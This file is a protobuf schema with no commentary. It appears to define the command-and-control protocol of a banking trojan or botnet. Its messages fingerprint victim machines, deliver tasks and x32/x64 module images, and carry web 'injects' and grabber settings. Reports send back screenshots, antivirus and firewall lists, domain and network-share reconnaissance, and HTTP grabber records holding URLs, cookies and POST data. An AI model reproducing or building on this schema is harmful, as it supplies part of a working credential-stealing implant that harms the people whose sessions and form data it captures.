// messageType system_data (only encode)
message system_data
{
	required string uid = 1;
	required int32 version = 2;
	required int32 cores = 3;
	required string display_resolution = 4;
	required string osVersion = 5;
	required string computerName = 6;
	required int32 architecture = 7;
}

// ? (only decode)
message moduleContext
{
	optional bytes ImageX64 = 1;
	optional bytes ImageX32 = 2;
	required int32 ImageX64Size = 3;
	required int32 ImageX32size = 4;
}

// (only encode)
message moduleInfo
{
	required int32 id = 1;
}

// data->settings (only decode)
message settings
{
	required int32 reportPolicy = 1;
	required bool coreProtection = 2;
	required int32 knockTimeout = 3;
}

// data->module (only decode)
message module
{
	required int32 id = 1;
	required bool constantlyActive = 2;
	optional string hash_x32 = 3;
	optional string hash_x64 = 4;
}

// data->task (only decode)
message task
{
	required int32 id = 1;
	required int32 sid = 2;
	required int32 command = 3;
	optional string context = 4;
}

// messageType data (only decode)
message data
{
	required settings settings = 1;
	repeated task tasks = 2;
	repeated module modules = 3;
	optional string injects = 4;
	optional string grabber_settings = 5;
}

// messageType report (only encode)
message report
{
    required int32 reportType = 1;
    required bytes report = 2;
}

// messageType task_exec_info (only encode)
message taskExecInfo
{
	required int32 task_id = 1;
	required int32 sid = 2;
	required int32 status = 3;
	required bool is_completed = 4;
}

// main message (encode/decode)
message generalPacket
{
    optional string uid = 1;
    required int32  messageType = 2;
    repeated bytes  payload = 3;
	repeated bytes signature = 4;
}

// ??????????????????????????????????????????????????????????????????????????????
message reportScreenshot
{
	required string mimeType = 1;
	required bytes data = 2;
	optional string description = 3;
}

message reportAntiviruses
{
	required string antiviruses_list = 1;
}

message reportFirewalls
{
	required string firewalls_list = 1;
}

message reportSoftware
{
	message SoftwareInfo
	{
		required string name = 1;
		optional string vendor = 2;
	}
	repeated SoftwareInfo software = 1;
}

message reportHttpGrabber
{
	required string url = 1;
	optional string useragent = 2;
	optional string content_type = 3;
	optional string accept_encoding = 4;
	optional string accept_language = 5;
	optional string referer = 6;
	optional string cookie = 7;
	optional string post_data = 8;
	optional int32 flags = 9;
}

message ReportNetView
{
	message NetView
	{
		required string name = 1;
		required string type = 2;
		required string platform = 3;
		optional string comment = 4;
	}
	message Domain
	{
		required string name = 1;
		required int32 role = 2;
	}
	repeated NetView netViewInfo = 1;
	required Domain domainInfo = 2;
	optional string extendedName = 3;
	optional string networkShares = 4;
}


// >start structures for server //

// >end structures for server //